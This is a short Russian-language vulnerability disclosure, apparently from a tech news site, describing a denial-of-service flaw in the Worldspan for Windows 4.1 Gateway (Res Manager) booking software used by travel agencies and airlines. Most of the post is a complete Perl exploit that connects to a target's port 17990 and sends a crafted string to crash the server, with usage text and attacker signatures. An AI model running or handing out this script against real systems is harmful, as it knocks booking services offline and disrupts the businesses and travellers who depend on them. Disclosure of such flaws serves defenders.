Worldspan - одна из ведущих компаний, которая создает программное обеспечение для использования туристическими агентствами. Программы Worldspan используется многими транспортными агентствами, авиалиниями и т.п. Уязвимость обнаружена в программе Res Manager (Worldspan for Windows), которая используется для подключения к Worldspan через
Интернет. 

Программа не в состоянии обработать специально сконструированный запрос к 17990 порту (который использует Res Manager для связи с агентами). При попытке обработать такой запрос система начнет использовать все доступные системные ресурсы, что, в конечном счете, приведет к краху сервера. 

Уязвимость обнаружена в Worldspan for Windows 4.1 Gateway 

Пример: 

#!/usr/bin/perl
#altomo@digitalgangsters.net
#Worldspan Gateway DoS
$sabre = "worldspanshouldgoboom";
use IO::Socket;
$ip = "$ARGV[0]";
$port = "17990";
if ($#ARGV<0) {
print " useage: $0 <ip>\n";
exit();
}
$socket = IO::Socket::INET->new(
Proto=>"tcp",
PeerAddr=>$ip,
PeerPort=>$port,);
print "Worldspan Gateway DoS\n";
print "altomo\@digitalgangsters.net\n";
print "Wait about a minute, and it should crash.\n";
print $socket "$sabre\r";
close $socket;
#nudehackers

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии